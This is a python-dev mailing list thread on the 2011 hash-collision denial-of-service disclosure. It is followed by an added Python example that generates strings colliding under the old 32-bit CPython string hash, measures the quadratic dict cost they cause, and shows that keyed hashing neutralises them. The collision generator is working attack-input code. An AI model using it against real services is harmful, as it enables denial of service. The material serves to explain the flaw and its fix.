On Wednesday, December 28, 2011 at 8:28 PM, Michael Foord wrote:

> Hello all,
>  
> A paper (well, presentation) has been published highlighting security 
> problems with the hashing algorithm (exploiting collisions) in many 
> programming languages Python included:
>  
> http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf
>  
> Although it's a security issue I'm posting it here because it is now public 
> and seems important.
>  
> The issue they report can cause (for example) handling an http post to 
> consume horrible amounts of cpu. For Python the figures they quoted:
>  
> - reasonable-sized attack strings only for 32 bits
> - Plone has max. POST size of 1 MB
> - 7 minutes of CPU usage for a 1 MB request
> - ~20 kbits/s → keep one Core Duo core busy
>  
> This was apparently reported to the security list, but hasn't been responded 
> to beyond an acknowledgement on November 24th (the original report didn't 
> make it onto the security list because it was held in a moderation queue).  
>  
> The same vulnerability was reported against various languages and web 
> frameworks, and is already fixed in some of them.
>  
> Their recommended fix is to randomize the hash function.
>  
> All the best,
>  
> Michael
>  
Back up link for the PDF:
http://dl.dropbox.com/u/1374/2007_28C3_Effective_DoS_on_web_application_platforms.pdf

Ocert disclosure:
http://www.ocert.org/advisories/ocert-2011-003.html

jesse  


_______________________________________________
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
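An added example, written for this page and not code from the thread, the 28C3 authors or CPython, to make the reported numbers concrete. It re-implements the pre-3.3 CPython string hash (x = c0 << 7; x = (1000003 * x) ^ c for each char; x ^= len) in unsigned 32-bit arithmetic, builds a set of equal-length strings with identical hashes by a meet-in-the-middle search (the technique the slides describe for Python; the multiplier is odd, so every step of the loop is invertible mod 2**32, and on a 32-bit build two tables of 64**3 entries are enough, which is why the slides say "only for 32 bits"), counts the key comparisons a dict makes while inserting them, and then shows that a hash keyed with a secret turns the precomputed set back into ordinary keys. Assumptions: the 64-character alphabet, the fixed first character (the old hash seeds its state from the first character, so it is held constant), the `LegacyKey` wrapper and all function names are this example's own, and `keyed_hash` uses BLAKE2b as a stand-in keyed hash rather than the SipHash-2-4 CPython adopted in 3.4 (hash randomization was added as an opt-in in 2.7.3/3.2.3 and enabled by default from 3.3).

```python
"""Added example: hash-collision DoS against the old CPython string hash,
and the keyed-hash mitigation.  Not code from the python-dev thread or from
CPython; names and parameters are this example's own assumptions."""
import hashlib
import os
import string

MASK32 = 0xFFFFFFFF
MULT = 1000003                      # multiplier of the old CPython string hash
MULT_INV = pow(MULT, -1, 1 << 32)   # inverse mod 2**32 (MULT is odd, so it exists)
ALPHABET = string.ascii_letters + string.digits + "-_"   # 64 chars: 64**6 = 2**36 blocks
FIRST = "x"                         # fixed first char: the old hash seeds from it


def step(x, ch):
    """One round of the old hash loop."""
    return ((MULT * x) ^ ord(ch)) & MASK32


def unstep(x, ch):
    """Inverse of step(): undo the xor, then multiply by MULT**-1."""
    return ((x ^ ord(ch)) * MULT_INV) & MASK32


def legacy_str_hash(s):
    """CPython 2.x / 3.2 string hash as computed on a 32-bit build (unsigned)."""
    if not s:
        return 0
    x = (ord(s[0]) << 7) & MASK32
    for ch in s:
        x = step(x, ch)
    return x ^ len(s)


def colliding_blocks(start):
    """Six-char blocks that all move hash state `start` to one common end state.

    Meet in the middle: tabulate all 64**3 prefixes forward from `start`, walk
    every 64**3 suffix backward from a target state (the end state of 'aaaaaa',
    so at least one block exists) and join on the middle state.  Expected hits
    for a well-mixed 32-bit function: 64**6 / 2**32 = 16."""
    fwd = {}
    for a in ALPHABET:
        xa = step(start, a)
        for b in ALPHABET:
            xb = step(xa, b)
            for c in ALPHABET:
                fwd[step(xb, c)] = a + b + c
    target = start
    for ch in ALPHABET[0] * 6:
        target = step(target, ch)
    blocks = []
    for f in ALPHABET:
        xf = unstep(target, f)
        for e in ALPHABET:
            xe = unstep(xf, e)
            for d in ALPHABET:
                prefix = fwd.get(unstep(xe, d))
                if prefix is not None:
                    blocks.append(prefix + d + e + f)
    return blocks, target


def build_collisions(rounds=2):
    """Equal-length strings with one legacy hash; roughly 16**rounds of them."""
    state = step((ord(FIRST) << 7) & MASK32, FIRST)
    strings = [FIRST]
    for _ in range(rounds):            # chain blocks: every combination collides
        blocks, state = colliding_blocks(state)
        strings = [s + b for s in strings for b in blocks]
    return strings


class LegacyKey:
    """str wrapper hashed with the old function; counts dict key comparisons."""
    eq_calls = 0

    def __init__(self, s):
        self.s = s

    def __hash__(self):
        return legacy_str_hash(self.s)

    def __eq__(self, other):
        LegacyKey.eq_calls += 1
        return isinstance(other, LegacyKey) and self.s == other.s


def insertion_cost(strings):
    """__eq__ calls made while inserting `strings` into one dict.  Equal hashes
    force a comparison with every earlier key on the probe path (n*(n-1)/2 in
    total); distinct hashes cost none, since the hash is checked before __eq__."""
    LegacyKey.eq_calls = 0
    table = {}
    for s in strings:
        table[LegacyKey(s)] = None
    return LegacyKey.eq_calls


def keyed_hash(s, key):
    """32-bit keyed hash (BLAKE2b stand-in): without the key, collisions cannot be precomputed."""
    return int.from_bytes(hashlib.blake2b(s.encode(), key=key, digest_size=4).digest(), "big")


def distinct_keyed_hashes(strings, key=None):
    """How many different hashes the precomputed colliding set gets under a secret key."""
    key = os.urandom(16) if key is None else key
    return len({keyed_hash(s, key) for s in strings})


if __name__ == "__main__":
    evil = build_collisions(2)
    benign = ["key%0*d" % (len(evil[0]) - 3, i) for i in range(len(evil))]
    print(len(evil), "strings, one legacy hash", hex(legacy_str_hash(evil[0])))
    print("comparisons, colliding keys:", insertion_cost(evil))
    print("comparisons, benign keys:   ", insertion_cost(benign))
    print("distinct keyed hashes:      ", distinct_keyed_hashes(evil), "of", len(evil))
```

The search runs in about a second of pure Python and yields a few hundred 13-character strings; a third round gives thousands, at which point the quadratic comparison count is what burns the minutes of CPU the slides quote for a 1 MB POST. On a 64-bit build the same function has a 64-bit state, so the two tables would need 2**32 entries each, which is the practical reason the attack was reported for 32-bit Python only.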